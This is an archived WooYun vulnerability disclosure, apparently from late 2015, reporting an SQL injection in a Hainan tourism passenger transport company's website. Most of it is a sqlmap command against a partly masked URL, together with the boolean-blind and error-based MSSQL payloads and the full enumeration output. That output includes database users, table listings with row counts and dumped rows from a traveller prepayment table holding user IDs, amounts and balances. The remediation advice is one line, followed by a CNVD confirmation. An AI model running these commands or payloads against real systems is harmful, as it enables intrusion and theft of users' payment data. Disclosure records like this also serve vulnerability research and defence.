乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-29: 细节已通知厂商并且等待厂商处理中 2015-12-03: 厂商已经确认,细节仅向厂商公开 2015-12-13: 细节向核心白帽子及相关领域专家公开 2015-12-23: 细节向普通白帽子公开 2016-01-02: 细节向实习白帽子公开 2016-01-17: 细节向公众公开
海南省旅游客运管理服务有限公司主站存在SQL注射漏洞(73万用户支付信息泄露)
地址:http://**.**.**.**/affiche_show.aspx?strAfficheId=273
$ python sqlmap.py -u "http://**.**.**.**/affiche_show.aspx?strAfficheId=273" -p strAfficheId --technique=BE --random-agent --batch -D TC_Database -T dbo.T_Traveler_PrePay -C User_Id,PrePay_Money,PrePay_Time,Have_Money,Action_Reason,Unit_d,Traveler_Id --dump --start 1 --stop 10
Database: TC_Database+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.T_Traveler_PrePay | 738080 |
Database: TC_DatabaseTable: T_Traveler_PrePay[10 entries]+---------+--------------+--------------------+------------+---------------+---------+-------------+| User_Id | PrePay_Money | PrePay_Time | Have_Money | Action_Reason | Unit_Id | Traveler_Id |+---------+--------------+--------------------+------------+---------------+---------+-------------+| 653 | 999.90 | 12 31 2014 11:07AM | 99994.69 | %u7f34%u7eb3 | 1 | 99 || 227 | 9573.90 | 12 30 2011 7:01AM | 9951.88 | %u8db3%u989d | 10 | 10 || 299 | 4504.08 | 09 24 2009 1:56PM | 195.92 | %u8db3%u989d | 100 | 100 || 878 | 9944.46 | 12 31 2013 10:22PM | 9954.81 | %u8db3%u989d | 101 | 101 || 239 | 959.00 | 12 31 2012 5:54PM | 9962.35 | %u8db3%u989d | 102 | 102 || 203 | 629.16 | 09 8 2010 10:13AM | 903.23 | %u8db3%u989d | 103 | 103 || 592 | 7380.00 | 12 2 2009 7:42AM | 8838.92 | %u8db3%u989d | 104 | 104 || 920 | 960.00 | 12 31 2012 8:02AM | 9992.41 | %u8db3%u989d | 105 | 105 || 260 | 933.76 | 12 26 2009 10:05AM | 9550.69 | %u8db3%u989d | 106 | 106 || 460 | 9915.00 | 12 31 2013 12:21PM | 99952.99 | %u8db3%u989d | 107 | 107 |+---------+--------------+--------------------+------------+---------------+---------+-------------+
---Parameter: strAfficheId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: strAfficheId=273 AND 1912=1912 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: strAfficheId=273 AND 5608=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (5608=5608) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005current user: 'saWeb'current user is DBA: Falsedatabase management system users [2]:[*] sa[*] saWebdatabase management system users password hashes:[*] sa [1]: password hash: +[*] saWeb [1]: password hash: +Database: TC_Database+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.T_Traveler_PrePay | 738080 || dbo.T_SendCar_PrintCount | 703497 || dbo.T_SendCar_Buy | 217343 || dbo.T_SendCar_Used | 215982 || dbo.T_SendCar | 212441 || dbo.T_SendCar_TravelOrderCode | 193434 || dbo.T_PrintRecord | 177966 || dbo.T_CarSecurity_AlBan | 164821 || dbo.T_SendCarApply | 129367 || dbo.GovTravelAgency | 101049 || dbo.T_Log | 72340 || dbo.t_AcceptSendCar | 67153 || dbo.T_BalanceDetail | 56131 || dbo.T_SendCar_CancelSetting | 35378 || dbo.T_BalanceCarDays | 33686 || dbo.T_CarCompanyApply | 25339 || dbo.T_SendCar_UsedTem | 11697 || dbo.T_SendCarTem | 11697 || dbo.T_Guides | 11096 || dbo.T_DriverAssesssPaiMing | 10982 || dbo.T_Breach | 10102 || dbo.t_PosLog | 9645 || dbo.T_DriverMonthBalance | 8138 || dbo.t_SendcarDriverAssesss | 7777 || dbo.T_CarKongShiQianDaoDetail | 7736 || dbo.T_CarWorkDaysDetail | 7692 || dbo.T_CarWaitCity | 6701 || dbo.T_Perview | 6033 || dbo.T_SendCarPlan | 5914 || dbo.T_Car_SheHui | 5805 || dbo.t_CarSign | 5433 || dbo.T_Sys_Para | 5112 || dbo.T_StaffLogin_Log | 3994 || dbo.T_Driver | 3928 || dbo.T_Car_Stop | 3457 || dbo.T_Car_Roll | 3141 || dbo.T_Car_Tem | 2994 || dbo.T_Driver_Tem | 2743 || dbo.T_CarEmgy | 2562 || dbo.T_SheHuiCarSendPolicy | 1879 || dbo.BalanceTemp | 1841 || dbo.T_Answer | 1835 || dbo.T_Car | 1800 || dbo.T_notify | 1667 || dbo.T_Staff | 1519 || dbo.t_CarOwer | 1438 || dbo.OwnerBank | 1372 || dbo.T_Client | 1352 || dbo.A_CarPhoto | 1327 || dbo.T_YanZhengMa | 1116 || dbo.T_Staff_Notify | 986 || dbo.T_PerivewGP | 738 || dbo.T_SendCarPlanQuanXian | 694 || dbo.T_Seat_Price | 656 || dbo.T_Unit | 587 || dbo.T_XZ_Driver | 569 || dbo.T_OperateSysRunProcess_Log | 466 || dbo.T_Affiche | 457 || dbo.MSreplication_objects | 228 || dbo.T_Price | 192 || dbo.T_ElectronCachet | 161 || dbo.MSsnapshotdeliveryprogress | 152 || dbo.T_CarPH | 151 || dbo.TenSeatChange | 144 || dbo.T_BalanceCarSeries | 138 || dbo.A_PosFail | 134 || dbo.T_News | 120 || dbo.t_CarOwer_Tem | 117 || dbo.T_Function | 112 || dbo.T_JourneyPoint | 91 || dbo.T_Punish | 91 || dbo.tempLength | 69 || dbo.yjtem | 68 || dbo.A_baobanch | 64 || dbo.T_BalanceMain | 63 || dbo.A_GCar | 36 || dbo.T_AllowSendCarUnit | 34 || dbo.TeSeatChange | 32 || dbo.TeSeatChangeT | 29 || dbo.T_PerviewG | 23 || dbo.BTep | 18 || dbo.T_Complain | 10 || dbo.syncobj_0x3037394341383045 | 6 || dbo.T_FriendLink | 6 || dbo.T_BalanceSeriesRate | 4 || dbo.T_Peccancy | 3 || dbo.MSsubscription_agents | 2 || dbo.MSreplication_subscriptions | 1 || dbo.MSsubscription_properties | 1 || dbo.T_BusinessCompany | 1 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 67941 || sys.sysmessages | 67941 || sys.syscolumns | 10642 || sys.all_parameters | 6697 || sys.system_parameters | 6697 || sys.trace_subclass_values | 4722 || sys.trace_event_bindings | 3958 || sys.all_columns | 3740 || sys.system_columns | 3696 || sys.syscomments | 2744 || dbo.spt_values | 2346 || sys.all_objects | 1747 || sys.sysobjects | 1747 || sys.system_objects | 1741 || sys.database_permissions | 1641 || sys.syspermissions | 1641 || sys.sysprotects | 1640 || sys.all_sql_modules | 1589 || sys.system_sql_modules | 1589 || sys.all_views | 284 || sys.system_views | 284 || sys.event_notification_event_types | 193 || sys.trace_events | 171 || sys.syscharsets | 114 || sys.allocation_units | 113 || sys.partitions | 102 || sys.system_components_surface_area_configuration | 98 || sys.xml_schema_facets | 97 || sys.xml_schema_components | 93 || sys.xml_schema_types | 77 || sys.trace_columns | 65 || sys.configurations | 62 || sys.sysconfigures | 62 || sys.syscurconfigs | 62 || sys.fulltext_document_types | 50 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 || INFORMATION_SCHEMA.COLUMNS | 44 || sys.columns | 44 || sys.syslanguages | 33 || sys.systypes | 27 || sys.types | 27 || sys.securable_classes | 21 || sys.trace_categories | 21 || INFORMATION_SCHEMA.SCHEMATA | 17 || sys.fulltext_languages | 17 || sys.schemas | 17 || sys.xml_schema_component_placements | 17 || sys.database_principals | 14 || sys.sysusers | 14 || sys.xml_schema_attributes | 14 || sys.database_mirroring | 12 || sys.database_recovery_status | 12 || sys.databases | 12 || sys.sysdatabases | 12 || sys.server_principals | 11 || sys.service_contract_message_usages | 11 || sys.sysindexes | 10 || sys.stats_columns | 9 || sys.server_permissions | 7 || sys.sql_dependencies | 7 || sys.sysdepends | 7 || sys.indexes | 6 || sys.objects | 6 || sys.stats | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || INFORMATION_SCHEMA.TABLES | 5 || sys.index_columns | 5 || sys.sysindexkeys | 5 || sys.tables | 5 || sys.endpoints | 4 || sys.servers | 3 || sys.service_queue_usages | 3 || sys.syssegments | 3 || sys.sysservers | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.login_token | 2 || sys.service_contract_usages | 2 || sys.sql_logins | 2 || sys.sysfiles | 2 || sys.syslogins | 2 || sys.user_token | 2 || dbo.spt_monitor | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_exec_requests | 1 || sys.dm_exec_sessions | 1 || sys.filegroups | 1 || sys.server_role_members | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysprocesses | 1 || sys.tcp_endpoints | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 21979 || dbo.backupmediafamily | 10914 || dbo.backupmediaset | 10914 || dbo.backupset | 10914 || dbo.restorefile | 375 || dbo.restorehistory | 197 || dbo.restorefilegroup | 138 |+--------------------------------------------------+---------+
Database: TC_DatabaseTable: T_Traveler_PrePay[9 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| Action_Reason | varchar || Have_Money | numeric || PrePay_Money | numeric || PrePay_Time | datetime || PrePay_Type | int || Relation_Object | varchar || Traveler_Id | int || Unit_Id | int || User_Id | int |+-----------------+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: strAfficheId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: strAfficheId=273 AND 1912=1912 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: strAfficheId=273 AND 5608=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (5608=5608) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: TC_DatabaseTable: T_Traveler_PrePay[10 entries]+---------+--------------+--------------------+------------+---------------+---------+-------------+| User_Id | PrePay_Money | PrePay_Time | Have_Money | Action_Reason | Unit_Id | Traveler_Id |+---------+--------------+--------------------+------------+---------------+---------+-------------+| 653 | 999.90 | 12 31 2014 11:07AM | 99994.69 | %u7f34%u7eb3 | 1 | 99 || 227 | 9573.90 | 12 30 2011 7:01AM | 9951.88 | %u8db3%u989d | 10 | 10 || 299 | 4504.08 | 09 24 2009 1:56PM | 195.92 | %u8db3%u989d | 100 | 100 || 878 | 9944.46 | 12 31 2013 10:22PM | 9954.81 | %u8db3%u989d | 101 | 101 || 239 | 959.00 | 12 31 2012 5:54PM | 9962.35 | %u8db3%u989d | 102 | 102 || 203 | 629.16 | 09 8 2010 10:13AM | 903.23 | %u8db3%u989d | 103 | 103 || 592 | 7380.00 | 12 2 2009 7:42AM | 8838.92 | %u8db3%u989d | 104 | 104 || 920 | 960.00 | 12 31 2012 8:02AM | 9992.41 | %u8db3%u989d | 105 | 105 || 260 | 933.76 | 12 26 2009 10:05AM | 9550.69 | %u8db3%u989d | 106 | 106 || 460 | 9915.00 | 12 31 2013 12:21PM | 99952.99 | %u8db3%u989d | 107 | 107 |+---------+--------------+--------------------+------------+---------------+---------+-------------+
上WAF。
危害等级:高
漏洞Rank:10
确认时间:2015-12-03 15:25
CNVD确认并复现所述情况,已经转由CNCERT下发给海南分中心,由其后续协调网站管理单位处置.
暂无
